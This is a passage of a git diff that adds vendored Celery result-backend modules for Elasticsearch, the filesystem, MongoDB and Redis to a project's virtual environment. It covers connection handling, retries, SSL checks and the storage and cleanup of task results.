kombu.utils.url import _parse_url + +from celery import states +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + import elasticsearch +except ImportError: + elasticsearch = None + +__all__ = ('ElasticsearchBackend',) + +E_LIB_MISSING = """\ +You need to install the elasticsearch library to use the Elasticsearch \ +result backend.\ +""" + + +class ElasticsearchBackend(KeyValueStoreBackend): + """Elasticsearch Backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`elasticsearch` is not available. + """ + + index = 'celery' + doc_type = 'backend' + scheme = 'http' + host = 'localhost' + port = 9200 + username = None + password = None + es_retry_on_timeout = False + es_timeout = 10 + es_max_retries = 3 + + def __init__(self, url=None, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + _get = self.app.conf.get + + if elasticsearch is None: + raise ImproperlyConfigured(E_LIB_MISSING) + + index = doc_type = scheme = host = port = username = password = None + + if url: + scheme, host, port, username, password, path, _ = _parse_url(url) + if scheme == 'elasticsearch': + scheme = None + if path: + path = path.strip('/') + index, _, doc_type = path.partition('/') + + self.index = index or self.index + self.doc_type = doc_type or self.doc_type + self.scheme = scheme or self.scheme + self.host = host or self.host + self.port = port or self.port + self.username = username or self.username + self.password = password or self.password + + self.es_retry_on_timeout = ( + _get('elasticsearch_retry_on_timeout') or self.es_retry_on_timeout + ) + + es_timeout = _get('elasticsearch_timeout') + if es_timeout is not None: + self.es_timeout = es_timeout + + es_max_retries = _get('elasticsearch_max_retries') + if es_max_retries is not None: + self.es_max_retries = es_max_retries + + self.es_save_meta_as_text = _get('elasticsearch_save_meta_as_text', True) + self._server = None + + def exception_safe_to_retry(self, exc): + if isinstance(exc, (elasticsearch.exceptions.TransportError)): + # 401: Unauthorized + # 409: Conflict + # 429: Too Many Requests + # 500: Internal Server Error + # 502: Bad Gateway + # 503: Service Unavailable + # 504: Gateway Timeout + # N/A: Low level exception (i.e. socket exception) + if exc.status_code in {401, 409, 429, 500, 502, 503, 504, 'N/A'}: + return True + return False + + def get(self, key): + try: + res = self._get(key) + try: + if res['found']: + return res['_source']['result'] + except (TypeError, KeyError): + pass + except elasticsearch.exceptions.NotFoundError: + pass + + def _get(self, key): + return self.server.get( + index=self.index, + doc_type=self.doc_type, + id=key, + ) + + def _set_with_state(self, key, value, state): + body = { + 'result': value, + '@timestamp': '{}Z'.format( + datetime.utcnow().isoformat()[:-3] + ), + } + try: + self._index( + id=key, + body=body, + ) + except elasticsearch.exceptions.ConflictError: + # document already exists, update it + self._update(key, body, state) + + def set(self, key, value): + return self._set_with_state(key, value, None) + + def _index(self, id, body, **kwargs): + body = {bytes_to_str(k): v for k, v in body.items()} + return self.server.index( + id=bytes_to_str(id), + index=self.index, + doc_type=self.doc_type, + body=body, + params={'op_type': 'create'}, + **kwargs + ) + + def _update(self, id, body, state, **kwargs): + """Update state in a conflict free manner. + + If state is defined (not None), this will not update ES server if either: + * existing state is success + * existing state is a ready state and current state in not a ready state + + This way, a Retry state cannot override a Success or Failure, and chord_unlock + will not retry indefinitely. + """ + body = {bytes_to_str(k): v for k, v in body.items()} + + try: + res_get = self._get(key=id) + if not res_get.get('found'): + return self._index(id, body, **kwargs) + # document disappeared between index and get calls. + except elasticsearch.exceptions.NotFoundError: + return self._index(id, body, **kwargs) + + try: + meta_present_on_backend = self.decode_result(res_get['_source']['result']) + except (TypeError, KeyError): + pass + else: + if meta_present_on_backend['status'] == states.SUCCESS: + # if stored state is already in success, do nothing + return {'result': 'noop'} + elif meta_present_on_backend['status'] in states.READY_STATES and state in states.UNREADY_STATES: + # if stored state is in ready state and current not, do nothing + return {'result': 'noop'} + + # get current sequence number and primary term + # https://www.elastic.co/guide/en/elasticsearch/reference/current/optimistic-concurrency-control.html + seq_no = res_get.get('_seq_no', 1) + prim_term = res_get.get('_primary_term', 1) + + # try to update document with current seq_no and primary_term + res = self.server.update( + id=bytes_to_str(id), + index=self.index, + doc_type=self.doc_type, + body={'doc': body}, + params={'if_primary_term': prim_term, 'if_seq_no': seq_no}, + **kwargs + ) + # result is elastic search update query result + # noop = query did not update any document + # updated = at least one document got updated + if res['result'] == 'noop': + raise elasticsearch.exceptions.ConflictError(409, 'conflicting update occurred concurrently', {}) + return res + + def encode(self, data): + if self.es_save_meta_as_text: + return super().encode(data) + else: + if not isinstance(data, dict): + return super().encode(data) + if data.get("result"): + data["result"] = self._encode(data["result"])[2] + if data.get("traceback"): + data["traceback"] = self._encode(data["traceback"])[2] + return data + + def decode(self, payload): + if self.es_save_meta_as_text: + return super().decode(payload) + else: + if not isinstance(payload, dict): + return super().decode(payload) + if payload.get("result"): + payload["result"] = super().decode(payload["result"]) + if payload.get("traceback"): + payload["traceback"] = super().decode(payload["traceback"]) + return payload + + def mget(self, keys): + return [self.get(key) for key in keys] + + def delete(self, key): + self.server.delete(index=self.index, doc_type=self.doc_type, id=key) + + def _get_server(self): + """Connect to the Elasticsearch server.""" + http_auth = None + if self.username and self.password: + http_auth = (self.username, self.password) + return elasticsearch.Elasticsearch( + f'{self.host}:{self.port}', + retry_on_timeout=self.es_retry_on_timeout, + max_retries=self.es_max_retries, + timeout=self.es_timeout, + scheme=self.scheme, + http_auth=http_auth, + ) + + @property + def server(self): + if self._server is None: + self._server = self._get_server() + return self._server diff --git a/env/Lib/site-packages/celery/backends/filesystem.py b/env/Lib/site-packages/celery/backends/filesystem.py new file mode 100644 index 00000000..22fd5dcf --- /dev/null +++ b/env/Lib/site-packages/celery/backends/filesystem.py @@ -0,0 +1,112 @@ +"""File-system result store backend.""" +import locale +import os +from datetime import datetime + +from kombu.utils.encoding import ensure_bytes + +from celery import uuid +from celery.backends.base import KeyValueStoreBackend +from celery.exceptions import ImproperlyConfigured + +default_encoding = locale.getpreferredencoding(False) + +E_NO_PATH_SET = 'You need to configure a path for the file-system backend' +E_PATH_NON_CONFORMING_SCHEME = ( + 'A path for the file-system backend should conform to the file URI scheme' +) +E_PATH_INVALID = """\ +The configured path for the file-system backend does not +work correctly, please make sure that it exists and has +the correct permissions.\ +""" + + +class FilesystemBackend(KeyValueStoreBackend): + """File-system result backend. + + Arguments: + url (str): URL to the directory we should use + open (Callable): open function to use when opening files + unlink (Callable): unlink function to use when deleting files + sep (str): directory separator (to join the directory with the key) + encoding (str): encoding used on the file-system + """ + + def __init__(self, url=None, open=open, unlink=os.unlink, sep=os.sep, + encoding=default_encoding, *args, **kwargs): + super().__init__(*args, **kwargs) + self.url = url + path = self._find_path(url) + + # Remove forwarding "/" for Windows os + if os.name == "nt" and path.startswith("/"): + path = path[1:] + + # We need the path and separator as bytes objects + self.path = path.encode(encoding) + self.sep = sep.encode(encoding) + + self.open = open + self.unlink = unlink + + # Lets verify that we've everything setup right + self._do_directory_test(b'.fs-backend-' + uuid().encode(encoding)) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__(args, {**kwargs, 'url': self.url}) + + def _find_path(self, url): + if not url: + raise ImproperlyConfigured(E_NO_PATH_SET) + if url.startswith('file://localhost/'): + return url[16:] + if url.startswith('file://'): + return url[7:] + raise ImproperlyConfigured(E_PATH_NON_CONFORMING_SCHEME) + + def _do_directory_test(self, key): + try: + self.set(key, b'test value') + assert self.get(key) == b'test value' + self.delete(key) + except OSError: + raise ImproperlyConfigured(E_PATH_INVALID) + + def _filename(self, key): + return self.sep.join((self.path, key)) + + def get(self, key): + try: + with self.open(self._filename(key), 'rb') as infile: + return infile.read() + except FileNotFoundError: + pass + + def set(self, key, value): + with self.open(self._filename(key), 'wb') as outfile: + outfile.write(ensure_bytes(value)) + + def mget(self, keys): + for key in keys: + yield self.get(key) + + def delete(self, key): + self.unlink(self._filename(key)) + + def cleanup(self): + """Delete expired meta-data.""" + if not self.expires: + return + epoch = datetime(1970, 1, 1, tzinfo=self.app.timezone) + now_ts = (self.app.now() - epoch).total_seconds() + cutoff_ts = now_ts - self.expires + for filename in os.listdir(self.path): + for prefix in (self.task_keyprefix, self.group_keyprefix, + self.chord_keyprefix): + if filename.startswith(prefix): + path = os.path.join(self.path, filename) + if os.stat(path).st_mtime < cutoff_ts: + self.unlink(path) + break diff --git a/env/Lib/site-packages/celery/backends/mongodb.py b/env/Lib/site-packages/celery/backends/mongodb.py new file mode 100644 index 00000000..c64fe380 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/mongodb.py @@ -0,0 +1,333 @@ +"""MongoDB result store backend.""" +from datetime import datetime, timedelta + +from kombu.exceptions import EncodeError +from kombu.utils.objects import cached_property +from kombu.utils.url import maybe_sanitize_url, urlparse + +from celery import states +from celery.exceptions import ImproperlyConfigured + +from .base import BaseBackend + +try: + import pymongo +except ImportError: + pymongo = None + +if pymongo: + try: + from bson.binary import Binary + except ImportError: + from pymongo.binary import Binary + from pymongo.errors import InvalidDocument +else: # pragma: no cover + Binary = None + + class InvalidDocument(Exception): + pass + +__all__ = ('MongoBackend',) + +BINARY_CODECS = frozenset(['pickle', 'msgpack']) + + +class MongoBackend(BaseBackend): + """MongoDB result backend. + + Raises: + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pymongo` is not available. + """ + + mongo_host = None + host = 'localhost' + port = 27017 + user = None + password = None + database_name = 'celery' + taskmeta_collection = 'celery_taskmeta' + groupmeta_collection = 'celery_groupmeta' + max_pool_size = 10 + options = None + + supports_autoexpire = False + + _connection = None + + def __init__(self, app=None, **kwargs): + self.options = {} + + super().__init__(app, **kwargs) + + if not pymongo: + raise ImproperlyConfigured( + 'You need to install the pymongo library to use the ' + 'MongoDB backend.') + + # Set option defaults + for key, value in self._prepare_client_options().items(): + self.options.setdefault(key, value) + + # update conf with mongo uri data, only if uri was given + if self.url: + self.url = self._ensure_mongodb_uri_compliance(self.url) + + uri_data = pymongo.uri_parser.parse_uri(self.url) + # build the hosts list to create a mongo connection + hostslist = [ + f'{x[0]}:{x[1]}' for x in uri_data['nodelist'] + ] + self.user = uri_data['username'] + self.password = uri_data['password'] + self.mongo_host = hostslist + if uri_data['database']: + # if no database is provided in the uri, use default + self.database_name = uri_data['database'] + + self.options.update(uri_data['options']) + + # update conf with specific settings + config = self.app.conf.get('mongodb_backend_settings') + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'MongoDB backend settings should be grouped in a dict') + config = dict(config) # don't modify original + + if 'host' in config or 'port' in config: + # these should take over uri conf + self.mongo_host = None + + self.host = config.pop('host', self.host) + self.port = config.pop('port', self.port) + self.mongo_host = config.pop('mongo_host', self.mongo_host) + self.user = config.pop('user', self.user) + self.password = config.pop('password', self.password) + self.database_name = config.pop('database', self.database_name) + self.taskmeta_collection = config.pop( + 'taskmeta_collection', self.taskmeta_collection, + ) + self.groupmeta_collection = config.pop( + 'groupmeta_collection', self.groupmeta_collection, + ) + + self.options.update(config.pop('options', {})) + self.options.update(config) + + @staticmethod + def _ensure_mongodb_uri_compliance(url): + parsed_url = urlparse(url) + if not parsed_url.scheme.startswith('mongodb'): + url = f'mongodb+{url}' + + if url == 'mongodb://': + url += 'localhost' + + return url + + def _prepare_client_options(self): + if pymongo.version_tuple >= (3,): + return {'maxPoolSize': self.max_pool_size} + else: # pragma: no cover + return {'max_pool_size': self.max_pool_size, + 'auto_start_request': False} + + def _get_connection(self): + """Connect to the MongoDB server.""" + if self._connection is None: + from pymongo import MongoClient + + host = self.mongo_host + if not host: + # The first pymongo.Connection() argument (host) can be + # a list of ['host:port'] elements or a mongodb connection + # URI. If this is the case, don't use self.port + # but let pymongo get the port(s) from the URI instead. + # This enables the use of replica sets and sharding. + # See pymongo.Connection() for more info. + host = self.host + if isinstance(host, str) \ + and not host.startswith('mongodb://'): + host = f'mongodb://{host}:{self.port}' + # don't change self.options + conf = dict(self.options) + conf['host'] = host + if self.user: + conf['username'] = self.user + if self.password: + conf['password'] = self.password + + self._connection = MongoClient(**conf) + + return self._connection + + def encode(self, data): + if self.serializer == 'bson': + # mongodb handles serialization + return data + payload = super().encode(data) + + # serializer which are in a unsupported format (pickle/binary) + if self.serializer in BINARY_CODECS: + payload = Binary(payload) + return payload + + def decode(self, data): + if self.serializer == 'bson': + return data + return super().decode(data) + + def _store_result(self, task_id, result, state, + traceback=None, request=None, **kwargs): + """Store return value and state of an executed task.""" + meta = self._get_result_meta(result=self.encode(result), state=state, + traceback=traceback, request=request, + format_date=False) + # Add the _id for mongodb + meta['_id'] = task_id + + try: + self.collection.replace_one({'_id': task_id}, meta, upsert=True) + except InvalidDocument as exc: + raise EncodeError(exc) + + return result + + def _get_task_meta_for(self, task_id): + """Get task meta-data for a task by id.""" + obj = self.collection.find_one({'_id': task_id}) + if obj: + if self.app.conf.find_value_for_key('extended', 'result'): + return self.meta_from_decoded({ + 'name': obj['name'], + 'args': obj['args'], + 'task_id': obj['_id'], + 'queue': obj['queue'], + 'kwargs': obj['kwargs'], + 'status': obj['status'], + 'worker': obj['worker'], + 'retries': obj['retries'], + 'children': obj['children'], + 'date_done': obj['date_done'], + 'traceback': obj['traceback'], + 'result': self.decode(obj['result']), + }) + return self.meta_from_decoded({ + 'task_id': obj['_id'], + 'status': obj['status'], + 'result': self.decode(obj['result']), + 'date_done': obj['date_done'], + 'traceback': obj['traceback'], + 'children': obj['children'], + }) + return {'status': states.PENDING, 'result': None} + + def _save_group(self, group_id, result): + """Save the group result.""" + meta = { + '_id': group_id, + 'result': self.encode([i.id for i in result]), + 'date_done': datetime.utcnow(), + } + self.group_collection.replace_one({'_id': group_id}, meta, upsert=True) + return result + + def _restore_group(self, group_id): + """Get the result for a group by id.""" + obj = self.group_collection.find_one({'_id': group_id}) + if obj: + return { + 'task_id': obj['_id'], + 'date_done': obj['date_done'], + 'result': [ + self.app.AsyncResult(task) + for task in self.decode(obj['result']) + ], + } + + def _delete_group(self, group_id): + """Delete a group by id.""" + self.group_collection.delete_one({'_id': group_id}) + + def _forget(self, task_id): + """Remove result from MongoDB. + + Raises: + pymongo.exceptions.OperationsError: + if the task_id could not be removed. + """ + # By using safe=True, this will wait until it receives a response from + # the server. Likewise, it will raise an OperationsError if the + # response was unable to be completed. + self.collection.delete_one({'_id': task_id}) + + def cleanup(self): + """Delete expired meta-data.""" + if not self.expires: + return + + self.collection.delete_many( + {'date_done': {'$lt': self.app.now() - self.expires_delta}}, + ) + self.group_collection.delete_many( + {'date_done': {'$lt': self.app.now() - self.expires_delta}}, + ) + + def __reduce__(self, args=(), kwargs=None): + kwargs = {} if not kwargs else kwargs + return super().__reduce__( + args, dict(kwargs, expires=self.expires, url=self.url)) + + def _get_database(self): + conn = self._get_connection() + return conn[self.database_name] + + @cached_property + def database(self): + """Get database from MongoDB connection. + + performs authentication if necessary. + """ + return self._get_database() + + @cached_property + def collection(self): + """Get the meta-data task collection.""" + collection = self.database[self.taskmeta_collection] + + # Ensure an index on date_done is there, if not process the index + # in the background. Once completed cleanup will be much faster + collection.create_index('date_done', background=True) + return collection + + @cached_property + def group_collection(self): + """Get the meta-data task collection.""" + collection = self.database[self.groupmeta_collection] + + # Ensure an index on date_done is there, if not process the index + # in the background. Once completed cleanup will be much faster + collection.create_index('date_done', background=True) + return collection + + @cached_property + def expires_delta(self): + return timedelta(seconds=self.expires) + + def as_uri(self, include_password=False): + """Return the backend as an URI. + + Arguments: + include_password (bool): Password censored if disabled. + """ + if not self.url: + return 'mongodb://' + if include_password: + return self.url + + if ',' not in self.url: + return maybe_sanitize_url(self.url) + + uri1, remainder = self.url.split(',', 1) + return ','.join([maybe_sanitize_url(uri1), remainder]) diff --git a/env/Lib/site-packages/celery/backends/redis.py b/env/Lib/site-packages/celery/backends/redis.py new file mode 100644 index 00000000..8acc6083 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/redis.py @@ -0,0 +1,668 @@ +"""Redis result store backend.""" +import time +from contextlib import contextmanager +from functools import partial +from ssl import CERT_NONE, CERT_OPTIONAL, CERT_REQUIRED +from urllib.parse import unquote + +from kombu.utils.functional import retry_over_time +from kombu.utils.objects import cached_property +from kombu.utils.url import _parse_url, maybe_sanitize_url + +from celery import states +from celery._state import task_join_will_block +from celery.canvas import maybe_signature +from celery.exceptions import BackendStoreError, ChordError, ImproperlyConfigured +from celery.result import GroupResult, allow_join_result +from celery.utils.functional import _regen, dictfilter +from celery.utils.log import get_logger +from celery.utils.time import humanize_seconds + +from .asynchronous import AsyncBackendMixin, BaseResultConsumer +from .base import BaseKeyValueStoreBackend + +try: + import redis.connection + from kombu.transport.redis import get_redis_error_classes +except ImportError: + redis = None + get_redis_error_classes = None + +try: + import redis.sentinel +except ImportError: + pass + +__all__ = ('RedisBackend', 'SentinelBackend') + +E_REDIS_MISSING = """ +You need to install the redis library in order to use \ +the Redis result store backend. +""" + +E_REDIS_SENTINEL_MISSING = """ +You need to install the redis library with support of \ +sentinel in order to use the Redis result store backend. +""" + +W_REDIS_SSL_CERT_OPTIONAL = """ +Setting ssl_cert_reqs=CERT_OPTIONAL when connecting to redis means that \ +celery might not validate the identity of the redis broker when connecting. \ +This leaves you vulnerable to man in the middle attacks. +""" + +W_REDIS_SSL_CERT_NONE = """ +Setting ssl_cert_reqs=CERT_NONE when connecting to redis means that celery \ +will not validate the identity of the redis broker when connecting. This \ +leaves you vulnerable to man in the middle attacks. +""" + +E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH = """ +SSL connection parameters have been provided but the specified URL scheme \ +is redis://. A Redis SSL connection URL should use the scheme rediss://. +""" + +E_REDIS_SSL_CERT_REQS_MISSING_INVALID = """ +A rediss:// URL must have parameter ssl_cert_reqs and this must be set to \ +CERT_REQUIRED, CERT_OPTIONAL, or CERT_NONE +""" + +E_LOST = 'Connection to Redis lost: Retry (%s/%s) %s.' + +E_RETRY_LIMIT_EXCEEDED = """ +Retry limit exceeded while trying to reconnect to the Celery redis result \ +store backend. The Celery application must be restarted. +""" + +logger = get_logger(__name__) + + +class ResultConsumer(BaseResultConsumer): + _pubsub = None + + def __init__(self, *args, **kwargs): + super().__init__(*args, **kwargs) + self._get_key_for_task = self.backend.get_key_for_task + self._decode_result = self.backend.decode_result + self._ensure = self.backend.ensure + self._connection_errors = self.backend.connection_errors + self.subscribed_to = set() + + def on_after_fork(self): + try: + self.backend.client.connection_pool.reset() + if self._pubsub is not None: + self._pubsub.close() + except KeyError as e: + logger.warning(str(e)) + super().on_after_fork() + + def _reconnect_pubsub(self): + self._pubsub = None + self.backend.client.connection_pool.reset() + # task state might have changed when the connection was down so we + # retrieve meta for all subscribed tasks before going into pubsub mode + if self.subscribed_to: + metas = self.backend.client.mget(self.subscribed_to) + metas = [meta for meta in metas if meta] + for meta in metas: + self.on_state_change(self._decode_result(meta), None) + self._pubsub = self.backend.client.pubsub( + ignore_subscribe_messages=True, + ) + # subscribed_to maybe empty after on_state_change + if self.subscribed_to: + self._pubsub.subscribe(*self.subscribed_to) + else: + self._pubsub.connection = self._pubsub.connection_pool.get_connection( + 'pubsub', self._pubsub.shard_hint + ) + # even if there is nothing to subscribe, we should not lose the callback after connecting. + # The on_connect callback will re-subscribe to any channels we previously subscribed to. + self._pubsub.connection.register_connect_callback(self._pubsub.on_connect) + + @contextmanager + def reconnect_on_error(self): + try: + yield + except self._connection_errors: + try: + self._ensure(self._reconnect_pubsub, ()) + except self._connection_errors: + logger.critical(E_RETRY_LIMIT_EXCEEDED) + raise + + def _maybe_cancel_ready_task(self, meta): + if meta['status'] in states.READY_STATES: + self.cancel_for(meta['task_id']) + + def on_state_change(self, meta, message): + super().on_state_change(meta, message) + self._maybe_cancel_ready_task(meta) + + def start(self, initial_task_id, **kwargs): + self._pubsub = self.backend.client.pubsub( + ignore_subscribe_messages=True, + ) + self._consume_from(initial_task_id) + + def on_wait_for_pending(self, result, **kwargs): + for meta in result._iter_meta(**kwargs): + if meta is not None: + self.on_state_change(meta, None) + + def stop(self): + if self._pubsub is not None: + self._pubsub.close() + + def drain_events(self, timeout=None): + if self._pubsub: + with self.reconnect_on_error(): + message = self._pubsub.get_message(timeout=timeout) + if message and message['type'] == 'message': + self.on_state_change(self._decode_result(message['data']), message) + elif timeout: + time.sleep(timeout) + + def consume_from(self, task_id): + if self._pubsub is None: + return self.start(task_id) + self._consume_from(task_id) + + def _consume_from(self, task_id): + key = self._get_key_for_task(task_id) + if key not in self.subscribed_to: + self.subscribed_to.add(key) + with self.reconnect_on_error(): + self._pubsub.subscribe(key) + + def cancel_for(self, task_id): + key = self._get_key_for_task(task_id) + self.subscribed_to.discard(key) + if self._pubsub: + with self.reconnect_on_error(): + self._pubsub.unsubscribe(key) + + +class RedisBackend(BaseKeyValueStoreBackend, AsyncBackendMixin): + """Redis task result store. + + It makes use of the following commands: + GET, MGET, DEL, INCRBY, EXPIRE, SET, SETEX + """ + + ResultConsumer = ResultConsumer + + #: :pypi:`redis` client module. + redis = redis + connection_class_ssl = redis.SSLConnection if redis else None + + #: Maximum number of connections in the pool. + max_connections = None + + supports_autoexpire = True + supports_native_join = True + + #: Maximal length of string value in Redis. + #: 512 MB - https://redis.io/topics/data-types + _MAX_STR_VALUE_SIZE = 536870912 + + def __init__(self, host=None, port=None, db=None, password=None, + max_connections=None, url=None, + connection_pool=None, **kwargs): + super().__init__(expires_type=int, **kwargs) + _get = self.app.conf.get + if self.redis is None: + raise ImproperlyConfigured(E_REDIS_MISSING.strip()) + + if host and '://' in host: + url, host = host, None + + self.max_connections = ( + max_connections or + _get('redis_max_connections') or + self.max_connections) + self._ConnectionPool = connection_pool + + socket_timeout = _get('redis_socket_timeout') + socket_connect_timeout = _get('redis_socket_connect_timeout') + retry_on_timeout = _get('redis_retry_on_timeout') + socket_keepalive = _get('redis_socket_keepalive') + health_check_interval = _get('redis_backend_health_check_interval') + + self.connparams = { + 'host': _get('redis_host') or 'localhost', + 'port': _get('redis_port') or 6379, + 'db': _get('redis_db') or 0, + 'password': _get('redis_password'), + 'max_connections': self.max_connections, + 'socket_timeout': socket_timeout and float(socket_timeout), + 'retry_on_timeout': retry_on_timeout or False, + 'socket_connect_timeout': + socket_connect_timeout and float(socket_connect_timeout), + } + + username = _get('redis_username') + if username: + # We're extra careful to avoid including this configuration value + # if it wasn't specified since older versions of py-redis + # don't support specifying a username. + # Only Redis>6.0 supports username/password authentication. + + # TODO: Include this in connparams' definition once we drop + # support for py-redis<3.4.0. + self.connparams['username'] = username + + if health_check_interval: + self.connparams["health_check_interval"] = health_check_interval + + # absent in redis.connection.UnixDomainSocketConnection + if socket_keepalive: + self.connparams['socket_keepalive'] = socket_keepalive + + # "redis_backend_use_ssl" must be a dict with the keys: + # 'ssl_cert_reqs', 'ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile' + # (the same as "broker_use_ssl") + ssl = _get('redis_backend_use_ssl') + if ssl: + self.connparams.update(ssl) + self.connparams['connection_class'] = self.connection_class_ssl + + if url: + self.connparams = self._params_from_url(url, self.connparams) + + # If we've received SSL parameters via query string or the + # redis_backend_use_ssl dict, check ssl_cert_reqs is valid. If set + # via query string ssl_cert_reqs will be a string so convert it here + if ('connection_class' in self.connparams and + issubclass(self.connparams['connection_class'], redis.SSLConnection)): + ssl_cert_reqs_missing = 'MISSING' + ssl_string_to_constant = {'CERT_REQUIRED': CERT_REQUIRED, + 'CERT_OPTIONAL': CERT_OPTIONAL, + 'CERT_NONE': CERT_NONE, + 'required': CERT_REQUIRED, + 'optional': CERT_OPTIONAL, + 'none': CERT_NONE} + ssl_cert_reqs = self.connparams.get('ssl_cert_reqs', ssl_cert_reqs_missing) + ssl_cert_reqs = ssl_string_to_constant.get(ssl_cert_reqs, ssl_cert_reqs) + if ssl_cert_reqs not in ssl_string_to_constant.values(): + raise ValueError(E_REDIS_SSL_CERT_REQS_MISSING_INVALID) + + if ssl_cert_reqs == CERT_OPTIONAL: + logger.warning(W_REDIS_SSL_CERT_OPTIONAL) + elif ssl_cert_reqs == CERT_NONE: + logger.warning(W_REDIS_SSL_CERT_NONE) + self.connparams['ssl_cert_reqs'] = ssl_cert_reqs + + self.url = url + + self.connection_errors, self.channel_errors = ( + get_redis_error_classes() if get_redis_error_classes + else ((), ())) + self.result_consumer = self.ResultConsumer( + self, self.app, self.accept, + self._pending_results, self._pending_messages, + ) + + def _params_from_url(self, url, defaults): + scheme, host, port, username, password, path, query = _parse_url(url) + connparams = dict( + defaults, **dictfilter({ + 'host': host, 'port': port, 'username': username, + 'password': password, 'db': query.pop('virtual_host', None)}) + ) + + if scheme == 'socket': + # use 'path' as path to the socket… in this case + # the database number should be given in 'query' + connparams.update({ + 'connection_class': self.redis.UnixDomainSocketConnection, + 'path': '/' + path, + }) + # host+port are invalid options when using this connection type. + connparams.pop('host', None) + connparams.pop('port', None) + connparams.pop('socket_connect_timeout') + else: + connparams['db'] = path + + ssl_param_keys = ['ssl_ca_certs', 'ssl_certfile', 'ssl_keyfile', + 'ssl_cert_reqs'] + + if scheme == 'redis': + # If connparams or query string contain ssl params, raise error + if (any(key in connparams for key in ssl_param_keys) or + any(key in query for key in ssl_param_keys)): + raise ValueError(E_REDIS_SSL_PARAMS_AND_SCHEME_MISMATCH) + + if scheme == 'rediss': + connparams['connection_class'] = redis.SSLConnection + # The following parameters, if present in the URL, are encoded. We + # must add the decoded values to connparams. + for ssl_setting in ssl_param_keys: + ssl_val = query.pop(ssl_setting, None) + if ssl_val: + connparams[ssl_setting] = unquote(ssl_val) + + # db may be string and start with / like in kombu. + db = connparams.get('db') or 0 + db = db.strip('/') if isinstance(db, str) else db + connparams['db'] = int(db) + + for key, value in query.items(): + if key in redis.connection.URL_QUERY_ARGUMENT_PARSERS: + query[key] = redis.connection.URL_QUERY_ARGUMENT_PARSERS[key]( + value + ) + + # Query parameters override other parameters + connparams.update(query) + return connparams + + @cached_property + def retry_policy(self): + retry_policy = super().retry_policy + if "retry_policy" in self._transport_options: + retry_policy = retry_policy.copy() + retry_policy.update(self._transport_options['retry_policy']) + + return retry_policy + + def on_task_call(self, producer, task_id): + if not task_join_will_block(): + self.result_consumer.consume_from(task_id) + + def get(self, key): + return self.client.get(key) + + def mget(self, keys): + return self.client.mget(keys) + + def ensure(self, fun, args, **policy): + retry_policy = dict(self.retry_policy, **policy) + max_retries = retry_policy.get('max_retries') + return retry_over_time( + fun, self.connection_errors, args, {}, + partial(self.on_connection_error, max_retries), + **retry_policy) + + def on_connection_error(self, max_retries, exc, intervals, retries): + tts = next(intervals) + logger.error( + E_LOST.strip(), + retries, max_retries or 'Inf', humanize_seconds(tts, 'in ')) + return tts + + def set(self, key, value, **retry_policy): + if isinstance(value, str) and len(value) > self._MAX_STR_VALUE_SIZE: + raise BackendStoreError('value too large for Redis backend') + + return self.ensure(self._set, (key, value), **retry_policy) + + def _set(self, key, value): + with self.client.pipeline() as pipe: + if self.expires: + pipe.setex(key, self.expires, value) + else: + pipe.set(key, value) + pipe.publish(key, value) + pipe.execute() + + def forget(self, task_id): + super().forget(task_id) + self.result_consumer.cancel_for(task_id) + + def delete(self, key): + self.client.delete(key) + + def incr(self, key): + return self.client.incr(key) + + def expire(self, key, value): + return self.client.expire(key, value) + + def add_to_chord(self, group_id, result): + self.client.incr(self.get_key_for_group(group_id, '.t'), 1) + + def _unpack_chord_result(self, tup, decode, + EXCEPTION_STATES=states.EXCEPTION_STATES, + PROPAGATE_STATES=states.PROPAGATE_STATES): + _, tid, state, retval = decode(tup) + if state in EXCEPTION_STATES: + retval = self.exception_to_python(retval) + if state in PROPAGATE_STATES: + raise ChordError(f'Dependency {tid} raised {retval!r}') + return retval + + def set_chord_size(self, group_id, chord_size): + self.set(self.get_key_for_group(group_id, '.s'), chord_size) + + def apply_chord(self, header_result_args, body, **kwargs): + # If any of the child results of this chord are complex (ie. group + # results themselves), we need to save `header_result` to ensure that + # the expected structure is retained when we finish the chord and pass + # the results onward to the body in `on_chord_part_return()`. We don't + # do this is all cases to retain an optimisation in the common case + # where a chord header is comprised of simple result objects. + if not isinstance(header_result_args[1], _regen): + header_result = self.app.GroupResult(*header_result_args) + if any(isinstance(nr, GroupResult) for nr in header_result.results): + header_result.save(backend=self) + + @cached_property + def _chord_zset(self): + return self._transport_options.get('result_chord_ordered', True) + + @cached_property + def _transport_options(self): + return self.app.conf.get('result_backend_transport_options', {}) + + def on_chord_part_return(self, request, state, result, + propagate=None, **kwargs): + app = self.app + tid, gid, group_index = request.id, request.group, request.group_index + if not gid or not tid: + return + if group_index is None: + group_index = '+inf' + + client = self.client + jkey = self.get_key_for_group(gid, '.j') + tkey = self.get_key_for_group(gid, '.t') + skey = self.get_key_for_group(gid, '.s') + result = self.encode_result(result, state) + encoded = self.encode([1, tid, state, result]) + with client.pipeline() as pipe: + pipeline = ( + pipe.zadd(jkey, {encoded: group_index}).zcount(jkey, "-inf", "+inf") + if self._chord_zset + else pipe.rpush(jkey, encoded).llen(jkey) + ).get(tkey).get(skey) + if self.expires: + pipeline = pipeline \ + .expire(jkey, self.expires) \ + .expire(tkey, self.expires) \ + .expire(skey, self.expires) + + _, readycount, totaldiff, chord_size_bytes = pipeline.execute()[:4] + + totaldiff = int(totaldiff or 0) + + if chord_size_bytes: + try: + callback = maybe_signature(request.chord, app=app) + total = int(chord_size_bytes) + totaldiff + if readycount == total: + header_result = GroupResult.restore(gid) + if header_result is not None: + # If we manage to restore a `GroupResult`, then it must + # have been complex and saved by `apply_chord()` earlier. + # + # Before we can join the `GroupResult`, it needs to be + # manually marked as ready to avoid blocking + header_result.on_ready() + # We'll `join()` it to get the results and ensure they are + # structured as intended rather than the flattened version + # we'd construct without any other information. + join_func = ( + header_result.join_native + if header_result.supports_native_join + else header_result.join + ) + with allow_join_result(): + resl = join_func( + timeout=app.conf.result_chord_join_timeout, + propagate=True + ) + else: + # Otherwise simply extract and decode the results we + # stashed along the way, which should be faster for large + # numbers of simple results in the chord header. + decode, unpack = self.decode, 